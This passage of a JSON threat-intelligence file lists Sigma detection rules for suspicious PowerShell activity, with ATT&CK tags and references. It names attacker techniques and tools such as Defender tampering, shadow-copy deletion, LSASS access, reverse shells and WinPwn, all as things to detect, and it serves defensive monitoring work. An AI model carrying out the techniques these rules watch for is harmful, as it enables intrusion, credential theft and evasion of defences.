"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.005" ] }, "related": [ { "dest-uuid": "7e7c2fba-7cca-486c-9582-4c1bb2851961", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5947497f-1aa4-41dd-9693-c9848d58727d", "value": "Suspicious Unblock-File" }, { "description": "Detects attempts to remove Windows Defender configuration using the 'MpPreference' cmdlet", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-05", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_tamper_windows_defender_rem_mp.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae2bdd58-0681-48ac-be7f-58ab4e593458", "value": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging" }, { "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers or properties within Active Directory.", "meta": { "author": "frack113", "creation_date": "2022-03-17", "falsepositive": [ "Unknown" ], "filename": "posh_ps_get_adcomputer.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-adcomputer", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1087.002/T1087.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml" ], "tags": [ "attack.discovery", "attack.t1018", "attack.t1087.002" ] }, "related": [ { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36bed6b2-e9a0-4fff-beeb-413a92b86138", "value": "Active Directory Computers Enumeration With Get-AdComputer" }, { "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", "meta": { "author": "frack113", "creation_date": "2021-08-03", "falsepositive": [ "Legitimate admin script" ], "filename": "posh_ps_timestomp.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", "https://www.offensive-security.com/metasploit-unleashed/timestomp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.006" ] }, "related": [ { "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c6438007-e081-42ce-9483-b067fbef33c3", "value": "Powershell Timestomp" }, { "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", "meta": { "author": "frack113", "creation_date": "2022-01-12", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_create_volume_shadow_copy.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://attack.mitre.org/datasources/DS0005/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "afd12fed-b0ec-45c9-a13d-aa86625dac81", "value": "Create Volume Shadow Copy with Powershell" }, { "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-04", "falsepositive": [ "Unlikely" ], "filename": "posh_ps_psasyncshell.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/JoelGMSec/PSAsyncShell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "afd3df04-948d-46f6-ae44-25966c44b97f", "value": "PSAsyncShell - Asynchronous TCP Reverse Shell" }, { "description": "Detects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.\n", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2023-12-04", "falsepositive": [ "As the script block is a blob of text. False positive may occur with scripts that contain the keyword as a reference or simply use it for detection." ], "filename": "posh_ps_hktl_winpwn.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/S3cur3Th1sSh1t/WinPwn", "https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841", "https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/", "https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team", "https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hktl_winpwn.yml" ], "tags": [ "attack.credential-access", "attack.defense-evasion", "attack.discovery", "attack.execution", "attack.privilege-escalation", "attack.t1046", "attack.t1082", "attack.t1106", "attack.t1518", "attack.t1548.002", "attack.t1552.001", "attack.t1555", "attack.t1555.003" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e3b6daca-e963-4a69-aee6-ed4fd653ad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "851fd622-b675-4d26-b803-14bc7baa517a", "value": "HackTool - WinPwn Execution - ScriptBlock" }, { "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add Windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-22", "falsepositive": [ "Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly." ], "filename": "posh_ps_add_windows_capability.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content", "https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_windows_capability.yml" ], "tags": [ "attack.execution" ] }, "uuid": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", "value": "Add Windows Capability Via PowerShell Script" }, { "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-25", "falsepositive": [ "Unknown" ], "filename": "posh_ps_clearing_windows_console_history.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.shellhacks.com/clear-history-powershell/", "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070", "attack.t1070.003" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bde47d4b-9987-405c-94c7-b080410e8ea7", "value": "Clearing Windows Console History" }, { "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", "meta": { "author": "frack113", "creation_date": "2022-02-01", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_mount_diskimage.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", "https://learn.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.005" ] }, "related": [ { "dest-uuid": "7e7c2fba-7cca-486c-9582-4c1bb2851961", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "29e1c216-6408-489d-8a06-ee9d151ef819", "value": "Suspicious Mount-DiskImage" }, { "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-17", "falsepositive": [ "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "filename": "posh_ps_computer_discovery_get_adcomputer.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" ], "tags": [ "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db885529-903f-4c5d-9864-28fe199e6370", "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell" }, { "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", "meta": { "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "creation_date": "2020-10-08", "falsepositive": [ "Administrators or Power users may remove their shares via cmd line" ], "filename": "posh_ps_susp_mounted_share_deletion.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.005" ] }, "related": [ { "dest-uuid": "a750a9f6-0bde-4bb3-9aae-1e2786e9780c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "66a4d409-451b-4151-94f4-a55d559c49b0", "value": "PowerShell Deleted Mounted Share" }, { "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-05", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_ace_tampering.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/HarmJ0y/DAMP", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation" ] }, "uuid": "2f77047c-e6e9-4c11-b088-a3de399524cd", "value": "Potential Persistence Via Security Descriptors - ScriptBlock" }, { "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", "meta": { "author": "frack113", "creation_date": "2021-12-15", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_smb_share_reco.yml", "level": "low", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "95f0643a-ed40-467c-806b-aac9542ec5ab", "value": "Suspicious Get Information for SMB Share" }, { "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "meta": { "author": "frack113", "creation_date": "2021-07-28", "falsepositive": [ "Unknown" ], "filename": "posh_ps_automated_collection.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml" ], "tags": [ "attack.collection", "attack.t1119" ] }, "related": [ { "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c1dda054-d638-4c16-afc8-53e007f3fbc5", "value": "Automated Collection Command PowerShell" }, { "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", "meta": { "author": "Tim Rauch", "creation_date": "2022-09-20", "falsepositive": [ "Unknown" ], "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c1337eb8-921a-4b59-855b-4ba188ddcc42", "value": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script" }, { "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", "meta": { "author": "Borna Talebi", "creation_date": "2021-09-14", "falsepositive": [ "Unknown" ], "filename": "posh_ps_add_dnsclient_rule.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps", "https://twitter.com/NathanMcNulty/status/1569497348841287681", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml" ], "tags": [ "attack.impact", "attack.t1565" ] }, "related": [ { "dest-uuid": "ac9e6b22-11bf-45d7-9181-c1cb08360931", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4368354e-1797-463c-bc39-a309effbe8d7", "value": "Powershell Add Name Resolution Policy Table Rule" }, { "description": "Detects parameters used by WMImplant", "meta": { "author": "NVISO", "creation_date": "2020-03-26", "falsepositive": [ "Administrative scripts that use the same keywords." ], "filename": "posh_ps_wmimplant.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/FortyNorthSecurity/WMImplant", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml" ], "tags": [ "attack.execution", "attack.t1047", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", "value": "WMImplant Hack Tool" }, { "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", "meta": { "author": "frack113", "creation_date": "2021-12-30", "falsepositive": [ "Legitimate administrative script" ], "filename": "posh_ps_get_acl_service.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.4", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml" ], "tags": [ "attack.persistence", "attack.t1574.011", "stp.2a" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "95afc12e-3cbb-40c3-9340-84a032e596a3", "value": "Service Registry Permissions Weakness Check" }, { "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-31", "falsepositive": [ "Installation of unsigned packages for testing purposes" ], "filename": "posh_ps_install_unsigned_appx_packages.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package", "https://twitter.com/WindowsDocs/status/1620078135080325122", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion" ] }, "uuid": "975b2262-9a49-439d-92a6-0709cccdf0b2", "value": "Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript" }, { "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-21", "falsepositive": [ "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" ], "filename": "posh_ps_susp_follina_execution.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1537919885031772161", "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "03409c93-a7c7-49ba-9a4c-a00badf2a153", "value": "Troubleshooting Pack Cmdlet Execution" }, { "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", "meta": { "author": "frack113", "creation_date": "2022-04-09", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_hyper_v_condlet.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", "https://learn.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.006" ] }, "related": [ { "dest-uuid": "b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", "value": "Suspicious Hyper-V Cmdlets" }, { "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "posh_ps_invoke_obfuscation_via_rundll.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell" }, { "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", "meta": { "author": "frack113", "creation_date": "2022-01-07", "falsepositive": [ "Legitimate script" ], "filename": "posh_ps_enable_psremoting.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.006" ] }, "related": [ { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "991a9744-f2f0-44f2-bd33-9092eba17dc3", "value": "Enable Windows Remote Management" }, { "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-04-23", "falsepositive": [ "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "filename": "posh_ps_susp_getprocess_lsass.yml", "level": "high", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", "value": "PowerShell Get-Process LSASS in ScriptBlock" }, { "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", "meta": { "author": "frack113", "creation_date": "2021-12-28", "falsepositive": [ "Unknown" ], "filename": "posh_ps_cmdlet_scheduled_task.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml" ], "tags": [ "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", "value": "Powershell Create Scheduled Task" }, { "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the Windows event logs", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-12", "falsepositive": [ "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" ], "filename": "posh_ps_susp_clear_eventlog.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", "https://twitter.com/oroneequalsone/status/1568432028361830402", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.001" ] }, "related": [ { "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0f017df3-8f5a-414f-ad6b-24aff1128278", "value": "Suspicious Eventlog Clear" }, { "description": "Detects suspicious Powershell code that execute COM Objects", "meta": { "author": "frack113", "creation_date": "2022-04-02", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "posh_ps_susp_gettypefromclsid.yml", "level": "medium", "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.t1546.015" ] }, "related": [ { "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 